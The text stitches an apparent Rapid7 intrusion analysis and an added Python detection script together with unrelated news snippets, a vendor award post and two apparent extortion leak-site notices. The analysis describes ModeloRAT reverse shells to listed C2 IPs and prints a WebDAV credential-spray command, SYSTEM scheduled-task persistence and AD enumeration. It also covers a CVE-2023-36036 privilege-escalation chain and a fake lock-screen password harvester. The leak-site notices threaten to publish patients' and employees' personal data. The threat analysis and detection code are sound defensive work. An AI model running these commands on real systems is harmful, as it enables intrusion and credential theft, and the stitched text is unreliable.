The script gathered the following information:

- System identity and patch level: systeminfo, domain queries
- Privilege context: whoami /all and .NET Security.Principal checks (USER / ADMIN / SYSTEM)
- Processes and services: Get-Process, Get-Service
- Network visibility: getmac.exe, arp -a, Get-NetTCPConnection, ping.exe
- Domain visibility: ran adsisearcher to enumerate accessible systems
- AV-Solutions: Securityhealthhost.exe, which is commonly used to verify if anti-virus solutions are running on the system

Table 1: Host Reconnaissance and Environment Enumeration.

All of these commands were executed through hidden PowerShell sessions using the CREATE_NO_WINDOW flag, allowing the script to run in the background without spawning visible console windows.

Reconnaissance also collected installed hotfixes and system version data. With this, the attacker was able to assess whether the host was vulnerable to a version-specific local privilege escalation exploit later used in the intrusion.

Additionally, collector.py and all other Python modules dropped by the malware were obfuscated. However, it was not difficult to recover code structure close to the original.
Figure 3: Obfuscated collector.py

Stage 2: Ties to ModeloRAT

Shortly after reconnaissance is completed, the attack shifts into its second stage with the execution of Pmanager.py.

    pythonw.exe ...\python\Pmanager.py start

Figure 4: Execution of Pmanager.py initiating second-stage C2 activity.

As soon as it is started, the script creates a long-running HTTP beacon over port 80 that rotates across 5 hardcoded C2 servers: 46.225.231[.]170, 144.172.99[.]68, 64.94.85[.]158, 140.82.6[.]45, and 45.76.241[.]51.

The script can load DLLs via rundll32.exe, launch additional Python scripts, run PowerShell commands, or install .msi packages. It also handles persistence and can update or remove itself. The reconnaissance output saved in configA.json is sent back to the C2, giving the operator a full picture of the host before issuing further tasks.

This behavior closely matches the ModeloRAT framework documented by Huntress (KongTuke / CrashFix campaigns). Its communication format, persistence mechanisms, and delivery model all match what has been previously observed, with no significant deviations.

The key difference is in initial access: Where earlier campaigns relied on malicious browser extensions, this intrusion used Microsoft Teams social engineering to achieve execution.

The on-demand shells and the WebDAV

Pmanager quickly deployed its first additional module, USOShared1297.py, onto the infected host. This module is a TCP reverse shell that opens 2 outbound sockets to one of 3 hardcoded C2 IPs (144.172.88[.]18, 64.190.113[.]187, 45.59.122[.]231). Port 50508 is reserved for the interactive shell that the attacker can use, and port 60503 is for file transfer.
The shell itself is a cmd.exe spawned using CreatePipe and CreateProcessA with the CREATE_NO_WINDOW and STARTF_USESTDHANDLES flags.

This access was then used to test credential reuse across the environment through repeated WebDAV authentication attempts against internal systems.

    rundll32.exe davclnt.dll,DavSetCookie http:///C%24/Windows

Figure 5: WebDAV authentication spray using davclnt.dll (DavSetCookie)

The DavSetCookie API forces Windows to initiate a WebDAV authentication attempt using the current user’s credentials. In effect, it allows the attacker to validate where those credentials are accepted without deploying additional tools. Within minutes, successful logon events started to appear across more than 100 internal systems.

The HTTP shell – internal.py

Not long after, the attacker added a second way into the system by deploying, back to back, Microsoft5237.py (dropped to %TEMP%) and internal.py (dropped to WPy64-31401\python). Later analysis showed they were actually the same file, just renamed (both had the same SHA-256 hash: 930263c0843744e269b615fb2ec79f83d7bd8b2cbf75e31fd5ea6c1aaa4e48fd). The attacker was reusing the same backdoor under different names.

Each script launched a hidden PowerShell session. First it checked whether the system was domain-joined, and then set up a persistent remote shell.

    powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command "(Get-CimInstance Win32_ComputerSystem).Domain"
    powershell -NoProfile -NoExit -Command -

Figure 6: The -NoExit flag keeps PowerShell running in the background, while the trailing “-” allows it to accept commands remotely.

From there, internal.py turned that session into a full HTTP-based control channel. It registered with the C2 via /handshake, continuously polled for instructions via /command/, executed them inside the PowerShell session, and returned output via /output/. The same channel handles file upload, download, and also screenshot capture.
All of this communication ran over port 80 to 87.120.186[.]229 and 149.248.78[.]202, blending in with normal web traffic.

Stage 3: Privilege escalation via CVE-2023-36036

After gaining remote access, the attacker executed ssss.dll to escalate privileges.

    rundll32.exe ssss.dll startproc Mw2[REDACTED]

Figure 7: Execution of ssss.dll via rundll32.

The argument passed to startproc is a decryption key. The startproc function uses Mw2[REDACTED] to decrypt the payload.

The ssss.dll (SHA-256: b00c1cbcfb98d2618a5c2ccb311da94f3c57709a397be6c8de29839f4e943976) is a reflective loader. The loader uses that key to decrypt an embedded payload in memory and execute it. The decrypted payload is testdllLPE.dll (SHA-256: d84245f3a374dd5eff8ecfdfad39077d76331fde799e5306430d0fc788db7f1d), a custom privilege escalation exploit targeting CVE-2023-36036. This vulnerability is a heap-based buffer overflow in cldflt.sys, the Windows Cloud Files Mini Filter Driver.

Within seconds, the helper thread launched internal.py under a SYSTEM token, confirming that the exploit successfully modified the process privileges.

What is CVE-2023-36036?

The Cloud Files driver is what makes OneDrive's "Files On-Demand" work, allowing placeholder files to appear locally while being backed by cloud storage. Sync providers (OneDrive, Dropbox, Box) register themselves with the driver using the Cloud Files API, and the driver brokers I/O between the filesystem and the provider.

CVE-2023-36036 is a heap buffer overflow in how cldflt.sys processes messages from these providers. By sending crafted data through the driver’s communication interface, an attacker can overflow an internal buffer and corrupt adjacent memory. With controlled heap layout, this corruption becomes a kernel write primitive.

Reused technique, adapted exploit

While analyzing the CVE-2023-36036 exploit, it became clear that the threat actor did not build their methodology from scratch.
STAR Labs documented a similar chain in their analysis of CVE-2021-31969, also in cldflt.sys. Their work outlined the core steps: Register a fake sync provider, shape the kernel heap, trigger the overflow, and overwrite a token.

The exploit we analyzed follows the same general playbook, but adapts it for the CVE-2023-36036 vulnerability.

The threat actor reused three core steps from the STAR Labs research to stabilize their exploit:

- Sync provider registration. The exploit registers itself as "PLURIBUS" with GUID {904EE598-0511-4664-82A8-22C4A7501044}, pointing to %TEMP%\cldflt. This causes the driver to treat the directory as a valid Cloud Files root and route file operations through the vulnerable path.
- WNF heap shaping. The exploit uses 4 undocumented ntdll syscalls (NtCreateWnfStateName, NtUpdateWnfStateData, NtDeleteWnfStateData, and NtQueryWnfStateData) to allocate a large number of small objects in the kernel pool. This shapes memory so the overflow lands on controlled data instead of random structures. Without this step, the buffer overflow in cldflt.sys would write to unpredictable addresses and could crash the system.
- Data-Only Token Overwrite. Instead of using process injection or shellcode, the exploit modifies its own token in kernel memory by flipping a privilege bit to gain SYSTEM access.

What sets testdllLPE.dll apart is what the operator added on top of that scaffolding.

- Kernel discovery method. It probes the kernel address range in 1 MB steps, measuring minute differences in memory access latency to identify the ntoskrnl base. This avoids calling privileged APIs.
- Decoupled execution model. Instead of elevating the thread running the exploit, this binary spawns a helper thread that continuously polls PrivilegeCheck(SeDebugPrivilege). This allows the main exploit thread to crash, hang, or retry the kernel write multiple times without losing the payload.
The moment the kernel finally flips the privilege bit, the helper thread detects the change and immediately launches internal.py as SYSTEM.
- Trigger path. The vulnerability is reached through the driver’s message handling path. When processing a FilterSendMessage request, cldflt.sys copies attacker-controlled data into a fixed-size buffer without proper bounds checking, overflowing into adjacent memory, specifically a function pointer.

To trigger execution, the exploit creates a placeholder file within the fake sync root and writes to it.

Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback.

When the driver intercepts the write to Link.log, it invokes the corrupted function pointer. This results in a controlled kernel write, which flips the SeDebugPrivilege bit in the helper thread's token.

After the WriteFile call completes, the main exploit thread exits. The helper thread, which was polling PrivilegeCheck(SeDebugPrivilege) once per second since the exploit started, detects the change and breaks out of its loop. At this point, the privilege escalation has succeeded. The helper thread immediately launches the payload.

Figure 9: Helper thread execution after privilege escalation succeeds.

Stage 4: Post-exploitation

The newly spawned internal.py process was running under a SYSTEM token.
The attacker confirmed this with whoami and immediately created a scheduled task (TempLogA) to execute internal.py daily at 13:00 with SYSTEM privileges.

    schtasks /create /tn TempLogA /tr "C:\Users\USER\AppData\Roaming\WPy64-31401\python\pythonw.exe internal.py" /sc daily /st 13:00 /ru SYSTEM /rl HIGHEST /f

Figure 10: Creation of SYSTEM-level scheduled task (TempLogA) for persistence.

With persistence in place, the attacker moved on to Active Directory enumeration.

    $d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry().distinguishedName
    $s = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://$d")
    $s.PageSize = 1000
    $s.Filter = "(objectClass=user)"
    $s.FindAll().Count

Figure 11: PowerShell command that returns the total number of domain user accounts.

Shortly after, the compromised account established a remote PowerShell session (WinRM) to a second host. Once connected, additional enumeration commands were executed through the remote PowerShell process (wsmprovhost.exe), extending visibility beyond the initial system.

Expanding the foothold

Within hours of privilege escalation and enumeration, 3 additional Python modules were deployed:

- Microsoft5237.py: HTTP beacon to 87.120.186.229 and 149.248.78.202. Captures screenshots via PowerShell, monitors user logins/logouts, uploads files to C2.
- Dell508.py: Reverse TCP tunnel to 207.246.114.50 and 149.28.96.170 on port 80, disguised as HTTP upgrade. C2 server instructs victim to connect to specific internal targets; victim relays traffic bidirectionally.
- PCDr6967.py: SOCKS5 proxy to 96.9.125.29, 144.172.111.49, and 104.194.152.246 on port 50504. Routes attacker's tools (RDP, browsers, Nmap) through victim into internal network.

Stage 5: The lock screen that wasn't

Roughly two hours after privilege escalation, the attacker deployed a second DLL.

    rundll32.exe com6848.dll,open e8vy[REDACTED]

Figure 12: Execution of com6848.dll via rundll32 to deploy credential harvesting payload.

The com6848.dll (SHA-256: 30e5a6c982396cdf3157195b540f75096869baa8570f66fab88c07c161be27f0, internal name apple.dll) is a 32-bit DLL with a single export, open. Its .rdata section is over 5 MB and contains an encrypted payload. The decryption key was conveniently provided on the command line by the attacker.

Once decrypted, the DLL reflectively loads a second stage, stage2.dll (SHA-256: f5b2dbd8ec9671c0261f093ebc5f3d35920b592458a3b800cc946265111e67d0). This DLL renders a perfect replica of the Windows 10 lock screen, using the embedded font to ensure visual accuracy even on systems where the font isn’t installed. The user sees what appears to be a normal screen lock and types their password to unlock it. The DLL captures it and writes the result to disk as yyyy-mm-dd-Log.txt.

What the credential unlocked

Wait, didn't the operator already have SYSTEM privileges? Why bother with a fake lock screen?

By this point, indeed the operator had SYSTEM-level access on the host. What they didn't have, though, was the user's domain credentials. SYSTEM can authenticate using the machine account, but it cannot authenticate as the user. It can't access user-specific resources, such as file shares requiring the user's permissions, mailboxes, web applications expecting user credentials, or RDP sessions that need to establish an interactive logon as that specific domain account.

The same evening, the attacker used harvested credentials to authenticate via RDP to another workstation in the network. DNS logs showed connections to Dropbox and some internal systems.
Additionally, they also performed Kerberoasting against service accounts, requesting vulnerable Kerberos tickets in an attempt to expand access within the environment.

The following morning, the attacker returned to the second host via RDP and used Microsoft Edge to download the Comae toolkit, including DumpIt, a legitimate memory acquisition tool. Two minutes after unarchiving the Comae toolkit, the threat actor navigated within the browser to uploadnow[.]io, which offers free anonymous file upload features. During this browser session, the threat actor searched via Bing if SwissTransfer was a safe site to transfer large files, likely evaluating additional exfiltration methods. Shortly after, DumpIt.exe was executed on the second host. DumpIt captures physical RAM, including LSASS process memory, which can contain cleartext passwords, NTLM hashes, and Kerberos tickets. Based on timing and network activity, the memory dump was likely exfiltrated via uploadnow[.]io.

MITRE ATT&CK techniques

TECHNIQUE ID | TECHNIQUE NAME
T1566.003 | Phishing: Spearphishing via Service
T1204.002 | User Execution: Malicious File
T1059.001 | Command & Scripting: PowerShell
T1059.006 | Command & Scripting: Python
T1218.011 | System Binary Proxy Execution: Rundll32
T1106 | Native API
T1053.005 | Scheduled Task/Job: Scheduled Task
T1068 | Exploitation for Privilege Escalation
T1134.001 | Access Token Manipulation: Token Impersonation
T1134.004 | Access Token Manipulation: Parent PID Spoofing
T1562.001 | Impair Defenses
T1027 | Obfuscated Files or Information
T1027.002 | Software Packing
T1027.009 | Embedded Payloads
T1620 | Reflective Code Loading
T1036.005 | Masquerading
T1140 | Deobfuscate/Decode Files or Information
T1112 | Modify Registry
T1055 | Process Injection
T1056.002 | Input Capture: GUI Input Capture
T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting
T1003.001 | OS Credential Dumping: LSASS Memory
T1003 | OS Credential Dumping
T1018 | Remote System Discovery
T1087.002 | Account Discovery: Domain Account
T1082 | System Information Discovery
T1016 | System Network Configuration Discovery
T1033 | System Owner/User Discovery
T1083 | File and Directory Discovery
T1021.006 | Remote Services: WinRM
T1021.001 | Remote Services: RDP
T1570 | Lateral Tool Transfer
T1071.001 | Application Layer Protocol: Web Protocols
T1095 | Non-Application Layer Protocol
T1090.001 | Proxy: Internal Proxy
T1090.002 | Proxy: External Proxy
T1572 | Protocol Tunneling
T1573 | Encrypted Channel
T1132.001 | Data Encoding: Standard Encoding
T1568 | Dynamic Resolution
T1567.002 | Exfiltration Over Web Service
T1041 | Exfiltration Over C2 Channel

Indicators of compromise (IOCs)

Category | Indicator Type | Value
Attacker Infrastructure | Rogue M365 Tenant (Sender) | itsupport@UCICasociacion.onmicrosoft.com
Attacker Infrastructure | Tenant GUID | cdc15b4d-6fd6-4e90-9ee9-357fea475047
Attacker Infrastructure | Client Hostnames | RICARDOGARC05B2, KALI-LINUX-2025-2
Attacker Infrastructure | Initial Access Vector | MS Teams external chat (Impersonating "IT Support")
Network C2 | Pmanager.py (ModeloRAT Beacon) | 46.225.231.170, 144.172.99.68, 64.94.85.158, 140.82.6.45, 45.76.241.51
Network C2 | collector.py (Exfiltration) | 87.120.186.229, 149.248.78.202 (Port 80)
Network C2 | internal.py / Microsoft5237.py | 87.120.186.229, 149.248.78.202 (Port 80)
Network C2 | USOShared1297.py (TCP Shell) | 144.172.88.18, 64.190.113.187, 45.59.122.231 (Ports 50508, 60503)
Network C2 | PCDr6967.py (SOCKS5) | 96.9.125.29, 144.172.111.49, 104.194.152.246 (Port 50504)
Network C2 | Dell508.py (HTTP Tunnel) | 207.246.114.50, 149.28.96.170 (Port 80)
Persistence Host | Cloud Files Provider Name | PLURIBUS
Persistence Host | Cloud Files Provider GUID | {904EE598-0511-4664-82A8-22C4A7501044}
Persistence Host | Registry Persistence Key | HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager\PLURIBUS!*
Persistence Host | Sync Root Path | %TEMP%\cldflt\
Persistence Host | Placeholder File | %TEMP%\cldflt\Link.log

More indicators of compromise can be found on Rapid7’s GitHub.

Key findings

- ModeloRAT pivoted from browser extensions to Teams social engineering.
- Portable Python environments bypass traditional EDR signatures.
- CVE-2023-36036 remains effective despite patch availability.
- Fake lock screens can harvest credentials even with SYSTEM access.
- WebDAV API abuse provides stealthy credential validation.

It took two days to go from "Hi, this is IT support" to domain-wide credential access using a fake lock screen, a Python based RAT, and a two-year-old kernel exploit. If you were an incident responder, none of these techniques would have been new for you, and that’s the point.

What particularly stands out is how quickly control shifted from endpoint to identity. Once valid credentials were obtained, the environment itself became the attack surface.
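The command-line patterns described in the Rapid7 write-up above (portable Python run from AppData, the DavSetCookie authentication spray, the stdin-driven PowerShell shell, and the SYSTEM scheduled task), expressed as a small detection pass over process-creation events. This is an added example, not Rapid7's detection content: the event layout, rule names, spray threshold, host names, user name and target names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Patterns are matched against lower-cased image paths and command lines.
PORTABLE_PY = re.compile(r"\\appdata\\.*\\pythonw?\.exe$")        # interpreter under a user profile
STDIN_SHELL = re.compile(r"-noexit\b.*-command\s+-\s*$")          # PowerShell fed commands on stdin
DAV_COOKIE = re.compile(r"davclnt\.dll,\s*davsetcookie\s+(\S+)")  # forced WebDAV authentication
TASK_SYSTEM = re.compile(r'/create\b.*/ru\s+"?system\b')          # task created to run as SYSTEM
USER_PATH = re.compile(r"\\users\\[^\\]+\\appdata\\")             # task payload in a user profile

SYS32 = "C:\\Windows\\System32\\"
WPY = "C:\\Users\\alice\\AppData\\Roaming\\WPy64-31401\\python\\"
DAV = "rundll32.exe davclnt.dll,DavSetCookie "

# Constructed process-creation events: (host, image path, command line).
SAMPLE_EVENTS = [
    ("WS-01", WPY + "pythonw.exe", "pythonw.exe " + WPY + "collector.py"),
    ("WS-01", WPY + "pythonw.exe", "pythonw.exe " + WPY + "Pmanager.py start"),
    ("WS-01", SYS32 + "rundll32.exe", DAV + "http://fs01.corp.example/C%24/Windows"),
    ("WS-01", SYS32 + "rundll32.exe", DAV + "http://fs02.corp.example/C%24/Windows"),
    ("WS-01", SYS32 + "rundll32.exe", DAV + "http://app03.corp.example/C%24/Windows"),
    ("WS-01", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command '
     '"(Get-CimInstance Win32_ComputerSystem).Domain"'),
    ("WS-01", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -NoProfile -NoExit -Command -"),
    ("WS-01", SYS32 + "schtasks.exe",
     'schtasks /create /tn TempLogA /tr "' + WPY + 'pythonw.exe internal.py" '
     "/sc daily /st 13:00 /ru SYSTEM /rl HIGHEST /f"),
    # Benign look-alikes: installed Python, and a single WebDAV mount attempt.
    ("WS-02", "C:\\Program Files\\Python312\\python.exe", "python.exe build.py"),
    ("WS-02", SYS32 + "rundll32.exe", DAV + "http://sharepoint.corp.example/sites/team"),
]


def detect(events, spray_threshold=3):
    """Return (host, rule, detail) findings for the behaviours in the write-up."""
    findings = []
    dav_targets = defaultdict(set)  # host -> distinct WebDAV targets contacted
    for host, image, cmd in events:
        image_l, cmd_l = image.lower(), cmd.lower()
        exe = image_l.rsplit("\\", 1)[-1]

        if PORTABLE_PY.search(image_l):
            findings.append((host, "python_from_user_profile", cmd))

        if exe in ("powershell.exe", "pwsh.exe") and STDIN_SHELL.search(cmd_l):
            findings.append((host, "powershell_stdin_shell", cmd))

        if exe == "schtasks.exe" and TASK_SYSTEM.search(cmd_l) and USER_PATH.search(cmd_l):
            findings.append((host, "system_task_from_user_profile", cmd))

        if exe == "rundll32.exe":
            match = DAV_COOKIE.search(cmd_l)
            if match:
                # A URL with an empty authority (http:///...) has no hostname.
                dav_targets[host].add(urlsplit(match.group(1)).hostname or "<no-host>")

    # One DavSetCookie call is ordinary WebDAV use; many distinct targets from
    # one host in the reviewed window is the credential-validation spray.
    for host, targets in sorted(dav_targets.items()):
        if len(targets) >= spray_threshold:
            findings.append((host, "webdav_auth_spray", ",".join(sorted(targets))))
    return findings


if __name__ == "__main__":
    for host, rule, detail in detect(SAMPLE_EVENTS):
        print(f"{host}  {rule:32s} {detail}")
```

In production the spray rule needs a time window and a threshold tuned to the environment, since the events here carry no timestamps.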
Open original transmissionRoony Bardghji, 20, fick inte plats i Sveriges VM-trupp. Enligt Aftonbladet berodde petningen bland annat på att Barcelona-spelaren visat missnöje kring utebliven speltid. – Det här är nyheter för mig, säger Graham Potter till SVT Sport.
SVT can reveal that Dante Peykar is suspected of being part of Iran's proxy war in Sweden. The 41-year-old, who is now being placed as a high-priority target on Europol's most wanted list, is reportedly linked to the alias that ordered the attempted murder of Iran expert Arvin Khoshnood.
Photo artist Erik Johansson is enjoying success around the world with his surrealist photographs, inspired by Dalí and Magritte. He lives in the Czech Republic, but he takes many of the pictures in the surroundings of his parents' farm in Svenstorp outside Götene, where his permanent gallery has also just opened for the season. "There is something magical about the places where I grew up," says Erik Johansson.
One seeks contractor to manage millions in taxpayer cash, will provide generous 20% off Windsor biscuit tins and tea towels
In this year's Eurovision Song Contest, Finland is represented by a duo: violinist Linda Lampenius and singer Pete Parkkonen, who together perform the song Liekinheitin. Parkkonen's career began with the Finnish Idol competition and reached new heights with a much-discussed music video that gave him the status of a sex symbol.
Gang leader Poya Shafie has been described as one of those closest to Foxtrot leader Rawa Majid. Shafie is suspected of being the brains behind several acts of violence in Stockholm and Sundsvall. The trial began on Wednesday.
At Rapid7, our commitment to our partners is built on the foundation of the PACT (Partnering with Accountability, Consistency, and Transparency) program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a Gold Stevie Award in the 2026 American Business Awards® for Achievement in Collaboration and Partnership. This recognition underscores our dedication to providing world-class training that translates directly into partner success and customer resilience.

A new era of partner-led services

To meet the evolving needs of the cybersecurity landscape, Rapid7 Partner Academy has introduced specialized Partner Services Certifications. These role-based learning paths are designed to move beyond traditional "product training" by focusing on high-fidelity service delivery and outcome-driven results, including how to build, deliver, and scale services on Rapid7 solutions. The training and certification program was specifically recognized for its "Partner-First" design, which was built through extensive collaboration with our global partner ecosystem to ensure alignment with real-world sales and technical challenges.

Our award-winning partner services certification ecosystem focuses on three critical pillars of the Rapid7 Command Platform:

- Partner Services for InsightIDR: Equips partners with the skills and knowledge necessary to effectively guide customers through the post-sale phases of the InsightIDR solution.
- Partner Services for Exposure Command: Focuses on the transition from static vulnerability scanning to continuous attack surface validation, diving into the setup, management, and troubleshooting of Exposure Command.
- Partner Services for Vulnerability Management: Empowers partners to provide impactful services around deployment, management, and ongoing support for InsightVM that drive customer success.

All three of these Partner Services Certifications enable our partners to deliver services around Rapid7 solutions from deployment and onboarding, to management and best practices for usage, to express health checks and troubleshooting. Upon successful completion of the course theoretical exam, you are eligible to enroll in the Services Validation Component. After validating your services capabilities, you will receive the prestigious distinction of achieving the Rapid7 Partner Services Certification and Badge. This achievement helps to differentiate your services to your customers and prospects with official recognition among the most capable Rapid7 MSSPs and service delivery partners.

Real-world impact: From training to execution

The Gold Stevie Award recognizes more than just curriculum—it recognizes the impact these certifications have on the partner's ability to drive business and accelerate their profitability with Rapid7. By completing these Rapid7 Partner Academy certifications, partners gain:

- Operational excellence: Technical specialists learn to deploy and manage Rapid7 solutions with a "Gold Standard" approach, ensuring high-fidelity results for customers.
- Strategic alignment: Sales professionals are trained in the RSP (Rapid7 Sales Professional) methodology, allowing them to position Rapid7 as the preferred solution through effective discovery and objection handling.
- Program economics: Certified partners can take full advantage of the 2026 PACT updates, which offer enhanced incentives and streamlined deal motions for partner-led growth.

Collaborating for success

The Stevie Award for Achievement in Collaboration and Partnership specifically applauds how Rapid7 integrated partner feedback into the curriculum development. This wasn't just Rapid7 talking to partners; it was a co-innovation effort. By coordinating with partners and Rapid7 technical support stakeholders, we ensured that the Partner Academy content directly addresses the "last-mile" technical blockers partners face in the field.

The value and impact of Partner Academy is highlighted by the comments from the Stevie American Business Awards® judges:

"I’ve seen a lot of partner programs, and most are built for the vendor, not the partner. This one stands out... A 5X outperformance, 76% completion rate, 91% satisfaction, and an NPS of 68 all point to real value delivered, not vanity metrics. I’m especially impressed by the coordination behind it – 100 contributors across 13 business units. That level of alignment is hard to achieve, and it shows strong leadership. The fact that the program was mentioned on an earnings call also signals clear strategic impact."

"Overall, this is an outstanding and result-oriented program, and it sets the bar high for the partner enablement process. Exceeding the certification target by 5X within a significantly shortened timeframe speaks volumes for the relevance and execution of the program, and the creation of role-based, technically sophisticated learning paths speaks volumes for the focus on partner enablement."

Celebrating our partners

This award is a shared victory with the thousands of partner individuals who have invested in their professional development through the Partner Academy. Whether you are a technical expert seeking to “Command the Attack Surface” or a sales professional looking to protect your margins, the Partner Academy is your gateway to success in the Rapid7 ecosystem.

Join the award-winning program and start your learning journey today!

As we continue to innovate, our goal remains the same: to provide the most transparent, consistent, and world-class enablement program in the industry. We invite all partners to officially become a Rapid7 PACT Partner to explore these award-winning certifications and start driving deeper impact for your customers today.
Article URL: https://avkcode.github.io/blog/us-winning-ai-race.html Comments URL: https://news.ycombinator.com/item?id=48121929 Points: 233 # Comments: 661
Allele Diagnostics specializes in providing exceptional microarray and cytogenetic testing services, including neonatal, pediatric, and prenatal testing. The company is dedicated to delivering accurate, fast, and reliable results, leveraging the extensive experience of its laboratory staff to optimize testing performance. We will upload corporate data soon. Detailed employee personal information (passports, DLs, SSNs, I9 forms, credit card details and so on), patients information (personal docs and medical information), contracts and agreements, etc.
Bittersweet post tells devs what they already knew: The framework is too slow
Microsoft has unveiled a new multi-model artificial intelligence (AI)-driven system called MDASH to facilitate vulnerability discovery and remediation at scale, adding that it's being tested by some customers as part of a limited private preview. MDASH, short for multi-model agentic scanning harness, is designed as a model-agnostic system that uses bespoke AI agents for different vulnerability
GCC 16.1 released at the end of April as the latest major, annual feature release to the GNU Compiler Collection. Early benchmarks showed some nice leads for GCC 16 over GCC 15. Continued testing of the new GCC 16 compiler has continued to show overall better performance of the resulting binaries than using GCC 15 on the same hardware and same compiler flags. That led many to wonder about the GCC 16 performance up against the latest LLVM/Clang open-source compiler, which is the focus of today's benchmarking showdown.
Want to watch the football World Cup together with others? In several places in Stockholm County, screenings of the matches on big screens are planned, both in urban settings and at restaurants and bars. Here is the guide to where you can watch the matches this summer.
May 19 launch will put redesigned rocket, pad, and engines through their paces
US Defence Secretary Pete Hegseth’s rare presence in President Donald Trump’s entourage to Beijing signals a willingness on both sides to strengthen military communications to de-escalate and avoid crises, and suggests US arms sales to Taiwan will feature in talks, analysts say. The Chinese experts expected Beijing to include Defence Minister Dong Jun in talks during the summit, with one source suggesting that Dong and Hegseth might also hold separate negotiations on the sidelines of the...
At Sapphire 2026, SAP presented what it calls the "Autonomous Enterprise": a sweeping vision in which AI agents not only assist employees but carry out business processes themselves. "We are building nothing less than a new SAP," CEO Christian Klein told attendees in Orlando, Florida. The company, he said, is on its way to "becoming a business AI company". At the core is SAP Autonomous Suite, which uses more than 50 domain-specific SAP Joule AI assistants across finance, supply chain, procurement, HR and customer engagement. These assistants coordinate a group of more than 200 specialized agents to carry out tasks from start to finish, from compressing the financial close to automating supply chain rebalancing. Klein stressed that AI for enterprises requires precision. "If AI handles payroll, financial closes or supply chain planning, 80 percent accuracy is not enough," he said.

A new platform and a new interface

The foundation of the suite is SAP's new Business AI Platform, which unites SAP's Business Technology Platform, Business Data Cloud and AI capabilities in a single governed environment. At its core is what SAP calls "enterprise memory", a context graph that supplies the agents with policies, procedures, Slack conversations and email approval chains so that they know what to do and, above all, what not to do. "When an exception occurs, it is added to the enterprise memory and all agents adapt immediately," said Muhammad Alam, executive board member responsible for product development. SAP also introduced Joule Work, which fundamentally changes how users interact with SAP software. Instead of navigating applications and entering data on different screens, users describe a desired outcome, and Joule coordinates workflows, data and agents to get it done.

For developers, SAP launched Joule Studio 2.0, which is available free of charge until the end of the year and lets them build agents with Python, Claude Code or Cursor and deploy them to a managed runtime. AI Agent Hub, which launches in the third quarter at no extra cost, offers a single place to discover, manage and govern agents in both SAP and non-SAP systems.

Partners and proof

SAP brought key partners on stage and on screen to underline its AI ambitions. In video clips, Anthropic president Daniela Amodei said that Claude models power Joule agents in finance, procurement and supply chain, and Nvidia CEO Jensen Huang discussed open agent protocols that make it possible for AI to act safely within enterprises. Jeremy Barnum, CFO of JP Morgan Chase, said the bank is upgrading its general ledger to SAP's unified platform and exploring agent capabilities for cash management. "You cannot realize the full potential of AI in a legacy environment," he said.

A number of customers have already put the system into production. According to Rob Fisher, KPMG's global head of advisory, the firm has, for example, deployed Joule for 270,000 users, with 3,000 consultants using 20 agents, and the firm aims to reduce contract leakage by 120 million dollars. In addition, Ericsson reported saving 90,000 hours by using personalized AI recommendations for its 85,000 employees. Bayer uses assistants for cash collection; Novartis has deployed procurement agents for large volumes; and H&M has demonstrated a store information system that delivers real-time performance data and AI-driven recommendations to store managers.

Mind the gap

Still, adoption lags behind ambition. Maribel Lopez, founder of Lopez Research, says companies are not implementing what is already available. "SAP customers are very cautious because SAP workloads are central to running the business," she says. Mickey North Rizza, head of enterprise software at analyst firm IDC, is more optimistic. "Currently, 73 percent of AI agents and assistants are used frequently and deliver savings of 30 to 90 minutes per day," she says. "SAP's AI vision is a guiding star for its customers to successfully enter the AI world."

SAP's Alam added that customers have grown impatient with the company's AI promises and have held him to account. Referring to the financial close assistant, one customer demanded: "Does it really exist? If it takes three months, I'll build it myself." That creates a new sense of urgency, Alam said.

Trust, but verify

SAP has made governance a central focus, Alam noted. The company has built SOX auditor compatibility into its framework to ensure audit readiness at the agent level, and every action is logged and traceable. But Jonathan von Rüeden, SAP's head of AI, acknowledged that customers have different levels of comfort with autonomy, depending on the process. "In a financial close process, the CFO will want to take a look when the books are closed. But people feel more comfortable with autonomous accruals."

SAP is also prioritizing interoperability. Agents built in Joule Studio will support the A2A protocol for connecting to third-party agents, and SAP's orchestration layer will govern non-SAP agents at no extra cost.

The road to autonomy

To speed up adoption, SAP has updated its offerings. RISE with SAP customers get three Joule assistants activated during their first year, while GROW with SAP customers get access to the entire agent portfolio at onboarding. Agent-led transformation tools can reduce migration work by about 35 percent, according to SAP. "But right now customers don't need thousands of agents; they need to get agentic AI up and running with a set of secure, governed agents that help them handle specific use cases," says Lopez. "Customers must ask themselves what the vision is, connect it to their needs and then plan the journey."
The notorious malware group TeamPCP appears to have published the source code of its Shai-Hulud worm openly on GitHub, The Register reports. Security company Ox discovered two public code repositories in which the group itself describes the project as open source. Shai-Hulud is a self-propagating worm that attacks NPM packages and tries to steal credentials for services such as AWS, GitHub, Azure and Google Cloud. If it succeeds, it can automatically infect more projects by publishing manipulated packages further along developers' supply chains. In some cases, the malware also tries to wipe the local environment if the attack fails. According to Ox, other attackers have already begun forking and modifying the code on GitHub for their own versions of the worm. At the time of the report, the repositories had been available for twelve hours without GitHub removing them.
The Institute of Private Enterprise Development focuses on improving the livelihoods of micro and small entrepreneurs by offering loans ranging from $40,000 to $7,500,000 GYD. Their services are designed to support individuals looking to start or grow their businesses, with a significant emphasis on female and youth entrepreneurs, as well as those in rural areas. We will upload 55gb of corporate data soon. Detailed clients and employee personal information (passports, DLs, SSNs, ID cards, financial information, credit card details and so on), NDAs, etc.
